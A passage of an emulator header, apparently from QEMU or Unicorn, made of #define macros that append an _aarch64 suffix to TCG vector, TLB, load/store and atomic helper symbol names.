tcg_gen_atomic_umin_fetch_i32_aarch64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_aarch64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_aarch64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_aarch64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_aarch64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_aarch64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_aarch64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_aarch64 #define simd_desc simd_desc_aarch64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_aarch64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_aarch64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_aarch64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_aarch64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_aarch64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_aarch64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_aarch64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_aarch64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_aarch64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_aarch64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_aarch64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_aarch64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_aarch64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_aarch64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_aarch64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_aarch64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_aarch64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_aarch64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_aarch64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_aarch64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_aarch64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_aarch64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_aarch64 #define tcg_gen_gvec_not tcg_gen_gvec_not_aarch64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_aarch64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_aarch64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_aarch64 #define tcg_gen_gvec_add tcg_gen_gvec_add_aarch64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_aarch64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_aarch64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_aarch64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_aarch64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_aarch64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_aarch64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_aarch64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_aarch64 #define tcg_gen_gvec_muls 
tcg_gen_gvec_muls_aarch64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_aarch64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_aarch64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_aarch64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_aarch64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_aarch64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_aarch64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_aarch64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_aarch64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_aarch64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_aarch64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_aarch64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_aarch64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_aarch64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_aarch64 #define tcg_gen_gvec_and tcg_gen_gvec_and_aarch64 #define tcg_gen_gvec_or tcg_gen_gvec_or_aarch64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_aarch64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_aarch64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_aarch64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_aarch64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_aarch64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_aarch64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_aarch64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_aarch64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_aarch64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_aarch64 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_aarch64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_aarch64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_aarch64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_aarch64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_aarch64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_aarch64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_aarch64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_aarch64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_aarch64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_aarch64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_aarch64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_aarch64 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_aarch64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_aarch64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_aarch64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_aarch64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_aarch64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_aarch64 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_aarch64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_aarch64 #define vec_gen_2 vec_gen_2_aarch64 #define vec_gen_3 vec_gen_3_aarch64 #define vec_gen_4 vec_gen_4_aarch64 #define tcg_gen_mov_vec tcg_gen_mov_vec_aarch64 #define tcg_const_zeros_vec tcg_const_zeros_vec_aarch64 #define tcg_const_ones_vec tcg_const_ones_vec_aarch64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_aarch64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_aarch64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_aarch64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_aarch64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_aarch64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_aarch64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_aarch64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_aarch64 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_aarch64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_aarch64 #define tcg_gen_ld_vec tcg_gen_ld_vec_aarch64 #define tcg_gen_st_vec tcg_gen_st_vec_aarch64 #define tcg_gen_stl_vec tcg_gen_stl_vec_aarch64 #define tcg_gen_and_vec tcg_gen_and_vec_aarch64 #define tcg_gen_or_vec 
tcg_gen_or_vec_aarch64 #define tcg_gen_xor_vec tcg_gen_xor_vec_aarch64 #define tcg_gen_andc_vec tcg_gen_andc_vec_aarch64 #define tcg_gen_orc_vec tcg_gen_orc_vec_aarch64 #define tcg_gen_nand_vec tcg_gen_nand_vec_aarch64 #define tcg_gen_nor_vec tcg_gen_nor_vec_aarch64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_aarch64 #define tcg_gen_not_vec tcg_gen_not_vec_aarch64 #define tcg_gen_neg_vec tcg_gen_neg_vec_aarch64 #define tcg_gen_abs_vec tcg_gen_abs_vec_aarch64 #define tcg_gen_shli_vec tcg_gen_shli_vec_aarch64 #define tcg_gen_shri_vec tcg_gen_shri_vec_aarch64 #define tcg_gen_sari_vec tcg_gen_sari_vec_aarch64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_aarch64 #define tcg_gen_add_vec tcg_gen_add_vec_aarch64 #define tcg_gen_sub_vec tcg_gen_sub_vec_aarch64 #define tcg_gen_mul_vec tcg_gen_mul_vec_aarch64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_aarch64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_aarch64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_aarch64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_aarch64 #define tcg_gen_smin_vec tcg_gen_smin_vec_aarch64 #define tcg_gen_umin_vec tcg_gen_umin_vec_aarch64 #define tcg_gen_smax_vec tcg_gen_smax_vec_aarch64 #define tcg_gen_umax_vec tcg_gen_umax_vec_aarch64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_aarch64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_aarch64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_aarch64 #define tcg_gen_shls_vec tcg_gen_shls_vec_aarch64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_aarch64 #define tcg_gen_sars_vec tcg_gen_sars_vec_aarch64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_aarch64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_aarch64 #define tb_htable_lookup tb_htable_lookup_aarch64 #define tb_set_jmp_target tb_set_jmp_target_aarch64 #define cpu_exec cpu_exec_aarch64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_aarch64 #define cpu_reloading_memory_map cpu_reloading_memory_map_aarch64 #define cpu_loop_exit cpu_loop_exit_aarch64 #define cpu_loop_exit_restore cpu_loop_exit_restore_aarch64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_aarch64 #define tlb_init tlb_init_aarch64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_aarch64 #define tlb_flush tlb_flush_aarch64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_aarch64 #define tlb_flush_all_cpus tlb_flush_all_cpus_aarch64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_aarch64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_aarch64 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_aarch64 #define tlb_flush_page tlb_flush_page_aarch64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_aarch64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_aarch64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_aarch64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_aarch64 #define tlb_protect_code tlb_protect_code_aarch64 #define tlb_unprotect_code tlb_unprotect_code_aarch64 #define tlb_reset_dirty tlb_reset_dirty_aarch64 #define tlb_set_dirty tlb_set_dirty_aarch64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_aarch64 #define tlb_set_page tlb_set_page_aarch64 #define get_page_addr_code_hostp get_page_addr_code_hostp_aarch64 #define get_page_addr_code get_page_addr_code_aarch64 #define probe_access probe_access_aarch64 #define tlb_vaddr_to_host tlb_vaddr_to_host_aarch64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_aarch64 #define helper_le_lduw_mmu helper_le_lduw_mmu_aarch64 #define helper_be_lduw_mmu 
helper_be_lduw_mmu_aarch64 #define helper_le_ldul_mmu helper_le_ldul_mmu_aarch64 #define helper_be_ldul_mmu helper_be_ldul_mmu_aarch64 #define helper_le_ldq_mmu helper_le_ldq_mmu_aarch64 #define helper_be_ldq_mmu helper_be_ldq_mmu_aarch64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_aarch64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_aarch64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_aarch64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_aarch64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_aarch64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_aarch64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_aarch64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_aarch64 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_aarch64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_aarch64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_aarch64 #define cpu_ldub_data_ra cpu_ldub_data_ra_aarch64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_aarch64 #define cpu_lduw_data_ra cpu_lduw_data_ra_aarch64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_aarch64 #define cpu_ldl_data_ra cpu_ldl_data_ra_aarch64 #define cpu_ldq_data_ra cpu_ldq_data_ra_aarch64 #define cpu_ldub_data cpu_ldub_data_aarch64 #define cpu_ldsb_data cpu_ldsb_data_aarch64 #define cpu_lduw_data cpu_lduw_data_aarch64 #define cpu_ldsw_data cpu_ldsw_data_aarch64 #define cpu_ldl_data cpu_ldl_data_aarch64 #define cpu_ldq_data cpu_ldq_data_aarch64 #define helper_ret_stb_mmu helper_ret_stb_mmu_aarch64 #define helper_le_stw_mmu helper_le_stw_mmu_aarch64 #define helper_be_stw_mmu helper_be_stw_mmu_aarch64 #define helper_le_stl_mmu helper_le_stl_mmu_aarch64 #define helper_be_stl_mmu helper_be_stl_mmu_aarch64 #define helper_le_stq_mmu helper_le_stq_mmu_aarch64 #define helper_be_stq_mmu helper_be_stq_mmu_aarch64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_aarch64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_aarch64 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_aarch64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_aarch64 #define cpu_stb_data_ra cpu_stb_data_ra_aarch64 #define cpu_stw_data_ra cpu_stw_data_ra_aarch64 #define cpu_stl_data_ra cpu_stl_data_ra_aarch64 #define cpu_stq_data_ra cpu_stq_data_ra_aarch64 #define cpu_stb_data cpu_stb_data_aarch64 #define cpu_stw_data cpu_stw_data_aarch64 #define cpu_stl_data cpu_stl_data_aarch64 #define cpu_stq_data cpu_stq_data_aarch64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_aarch64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_aarch64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_aarch64 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_aarch64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_aarch64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_aarch64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_aarch64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_aarch64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_aarch64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_aarch64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_aarch64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_aarch64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_aarch64 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_aarch64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_aarch64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_aarch64 #define helper_atomic_smax_fetchb_mmu 
helper_atomic_smax_fetchb_mmu_aarch64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_aarch64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_aarch64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_aarch64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_aarch64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_aarch64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_aarch64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_aarch64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_aarch64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_aarch64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_aarch64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_aarch64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_aarch64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_aarch64 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_aarch64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_aarch64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_aarch64 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_aarch64 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_aarch64 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_aarch64 #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_aarch64 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_aarch64 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_aarch64 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_aarch64 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_aarch64 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_aarch64 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_aarch64 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_aarch64 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_aarch64 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_aarch64 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_aarch64 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_aarch64 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_aarch64 #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_aarch64 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_aarch64 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_aarch64 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_aarch64 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_aarch64 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_aarch64 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_aarch64 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_aarch64 #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_aarch64 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_aarch64 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_aarch64 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_aarch64 #define 
helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_aarch64 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_aarch64 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_aarch64 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_aarch64 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_aarch64 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_aarch64 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_aarch64 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_aarch64 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_aarch64 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_aarch64 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_aarch64 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_aarch64 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_aarch64 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_aarch64 #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_aarch64 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_aarch64 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_aarch64 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_aarch64 #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_aarch64 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_aarch64 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_aarch64 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_aarch64 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_aarch64 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_aarch64 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_aarch64 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_aarch64 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_aarch64 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_aarch64 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_aarch64 #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_aarch64 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_aarch64 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_aarch64 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_aarch64 #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_aarch64 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_aarch64 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_aarch64 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_aarch64 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_aarch64 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_aarch64 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_aarch64 #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_aarch64 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_aarch64 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_aarch64 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_aarch64 #define 
helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_aarch64 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_aarch64 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_aarch64 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_aarch64 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_aarch64 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_aarch64 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_aarch64 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_aarch64 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_aarch64 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_aarch64 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_aarch64 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_aarch64 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_aarch64 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_aarch64 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_aarch64 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_aarch64 #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_aarch64 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_aarch64 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_aarch64 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_aarch64 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_aarch64 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_aarch64 #define helper_atomic_xchgb helper_atomic_xchgb_aarch64 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_aarch64 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_aarch64 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_aarch64 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_aarch64 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_aarch64 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_aarch64 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_aarch64 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_aarch64 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_aarch64 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_aarch64 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_aarch64 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_aarch64 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_aarch64 #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_aarch64 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_aarch64 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_aarch64 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_aarch64 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_aarch64 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_aarch64 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_aarch64 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_aarch64 #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_aarch64 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_aarch64 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_aarch64 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_aarch64 #define helper_atomic_xor_fetchw_le 
